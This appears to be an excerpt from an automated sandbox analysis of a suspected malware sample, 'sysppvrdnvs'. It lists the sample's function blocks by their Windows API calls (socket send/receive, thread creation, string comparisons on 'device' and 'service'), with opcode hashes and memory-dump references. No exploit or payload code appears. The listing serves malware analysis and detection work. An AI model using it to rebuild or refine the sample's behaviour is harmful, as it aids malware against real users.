                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 671207744-0
                                                                                                                                                                                              • Opcode ID: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
                                                                                                                                                                                              • Instruction ID: f2cbb4ded8662be063e38a6044f3a63d93470e371ff4fbf655dea468244fd3f8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeStringlstrcmpi
                                                                                                                                                                                              • String ID: device$deviceType
                                                                                                                                                                                              • API String ID: 1602765415-3511266565
                                                                                                                                                                                              • Opcode ID: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                                                                              • Instruction ID: 03739fb7cbf0ac8b4f24cf275543a684364e3b5b0ef8f18e7a9da7a5ef98527e
                                                                                                                                                                                              • Opcode Fuzzy Hash: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A413A75A0020ADFCB04DF99D884BAFB7B5FF48304F108969E505A7390D778AA91CB95
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeStringlstrcmpi
                                                                                                                                                                                              • String ID: service$serviceType
                                                                                                                                                                                              • API String ID: 1602765415-3667235276
                                                                                                                                                                                              • Opcode ID: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                                                                              • Instruction ID: 010777473a756836e58c8d4bedbd534eac8e5d19c37eb4cb5fbe46cee8795b1d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F416A74A0020ADFDB04CF99C884BAFB7B9BF48304F108969E505B7390D779AE81CB95
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                              • Opcode ID: f026b787823f1fefae13d68ad76e75e92e04a5364415cb1f746f57a7895214dd
                                                                                                                                                                                              • Instruction ID: a453b5b0d0ea6fd4c501cc83d62b7a74cd48d0bc9ee55fa6e36116878b1ddbe7
                                                                                                                                                                                              • Opcode Fuzzy Hash: f026b787823f1fefae13d68ad76e75e92e04a5364415cb1f746f57a7895214dd
                                                                                                                                                                                              • Instruction Fuzzy Hash: D231D1722012059BC710AFB5ED8CAE7B7A8FB44314F04863EE55AD3280DB78A4449BA9
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeStringlstrcmpi
                                                                                                                                                                                              • String ID: device$deviceType
                                                                                                                                                                                              • API String ID: 1602765415-3511266565
                                                                                                                                                                                              • Opcode ID: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                                                                              • Instruction ID: 82367b585ef85f09a19fbcbd702cec43aacbd83c2379c0e5ae25b899a50ddae9
                                                                                                                                                                                              • Opcode Fuzzy Hash: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                                                                              • Instruction Fuzzy Hash: F1313970A0020ADFCB14CF99D884BEFB7B5FF88304F108969E514A7390D778AA91CB95
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeStringlstrcmpi
                                                                                                                                                                                              • String ID: service$serviceType
                                                                                                                                                                                              • API String ID: 1602765415-3667235276
                                                                                                                                                                                              • Opcode ID: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                                                                              • Instruction ID: b0af1682f63206834f838cc0e71cdea1734b5e967c65deefb948a4066f0743c7
                                                                                                                                                                                              • Opcode Fuzzy Hash: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 09312874A0420A9FDB04CF99C884BEFB7B5BF48304F108969E615B7390D779AA81CB95
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleep$CountTickrandsrand
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3488799664-0
                                                                                                                                                                                              • Opcode ID: 37ea556368018ed224677055f20a6db6f5d4f480788f3e6807c6e2582d8e890c
                                                                                                                                                                                              • Instruction ID: d526f444081091d18ff5343ef40ffd9a09f2c1e6f6858c3ecb06089bc02b22b2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 37ea556368018ed224677055f20a6db6f5d4f480788f3e6807c6e2582d8e890c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F21A479E00208FBC704DF60D885AAE7B31AB45304F10C47AE9026B381D679BA80CB56
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _allshl_aullshr
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 673498613-0
                                                                                                                                                                                              • Opcode ID: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                                                                              • Instruction ID: 526ada65c8064deb58b6c5f7a60763359622b06b1071bb594fb8502c37df64e6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                                                                              • Instruction Fuzzy Hash: C1111F32600618AB8B10EF5EC4426CABBD6EF84361B25C136FC2CDF359D634DA454BD8
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(02E50634), ref: 0040DEA9
                                                                                                                                                                                              • CloseHandle.KERNEL32(02E50638), ref: 0040DED8
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(02E50634), ref: 0040DEE7
                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(02E50634), ref: 0040DEF4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 3102160386-507759092
                                                                                                                                                                                              • Opcode ID: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                                                                              • Instruction ID: ac11750a047aba6f79e7b8cc85f80e728fdbf261864cbbb5073f4aff0768140e
                                                                                                                                                                                              • Opcode Fuzzy Hash: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                                                                              • Instruction Fuzzy Hash: 65115E74D00208EBDB08DF94D984A9DBB75FF48309F1081A9E806AB341D734EE94DB89
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401346
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401352
                                                                                                                                                                                              • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 0040135C
                                                                                                                                                                                                • Part of subcall function 0040AB60: HeapFree.KERNEL32(02E50000,00000000,00402612,?,00402612,?), ref: 0040ABBB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                                                                              • String ID: pdu$.#v
                                                                                                                                                                                              • API String ID: 309973729-1687148394
                                                                                                                                                                                              • Opcode ID: 5b030ae644c6dbc9ea9d97babe0c3ba4c899ce10d031904438c25fa37c6040b2
                                                                                                                                                                                              • Instruction ID: d5c9189d357da9e52bb83819b3173fb4210b6dfc4c93b70417a9898bc2e8bd9b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b030ae644c6dbc9ea9d97babe0c3ba4c899ce10d031904438c25fa37c6040b2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D0186765003109BCB20AF66ECC4E9B7779AF48711B044679FD056B396C738E85087A9
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                                                                                                                                • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                                • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                                • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3966618661-0
                                                                                                                                                                                              • Opcode ID: 491eb203a0c6402b031db6bffc66d55fae6273400cfd7448ee54caaea6ad20ee
                                                                                                                                                                                              • Instruction ID: 3b152336b57d45bd484518126aaa8069a8e5b95e48398e5ac574b9fb36890b51
                                                                                                                                                                                              • Opcode Fuzzy Hash: 491eb203a0c6402b031db6bffc66d55fae6273400cfd7448ee54caaea6ad20ee
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C41C371A00A02ABC714AB399848793F3A4BF84310F14823AE82D93391E739B855CB99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _allshl
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 435966717-0
                                                                                                                                                                                              • Opcode ID: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                                                                              • Instruction ID: d897fcd8a6e9f4a7bfe0dcf07208541f34cf8f45c30d72ee7b1e381ef02b65f1
                                                                                                                                                                                              • Opcode Fuzzy Hash: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                                                                              • Instruction Fuzzy Hash: D2F03672D015289B9710FEEF84424CAFBE59F89354B21C176F818E3360E6709E0946F1
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memcpy.NTDLL(00000000,?,?), ref: 004076E8
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00407720,00000000,00000000,00000000), ref: 0040770A
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00407711
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCreateHandleThreadmemcpy
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 2064604595-507759092
                                                                                                                                                                                              • Opcode ID: 69a3062be9f96e8746b97fe22f816949e30cab75ecd54b1de59a1ef8a98444b9
                                                                                                                                                                                              • Instruction ID: 1765171bc77b4966af89c460e37a8a9fa1404b8c40c23c814704cc40933dc83e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 69a3062be9f96e8746b97fe22f816949e30cab75ecd54b1de59a1ef8a98444b9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 54F090B1A04308FBDB00DFA4DC46F9E7778AB48704F208468FA08A72C1D675BA10C769
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                                                                                                                              • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                                                                                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2074799992-0
                                                                                                                                                                                              • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                              • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                              • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,00401FD3,00000000), ref: 00401C90
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,?,?,?,00401FD3,00000000), ref: 00401CA6
                                                                                                                                                                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Recv$ErrorLastSleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3668019968-0
                                                                                                                                                                                              • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                                                                              • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                                                                                                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Send$ErrorLastSleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2121970615-0
                                                                                                                                                                                              • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                              • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                                                                                                                                              • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
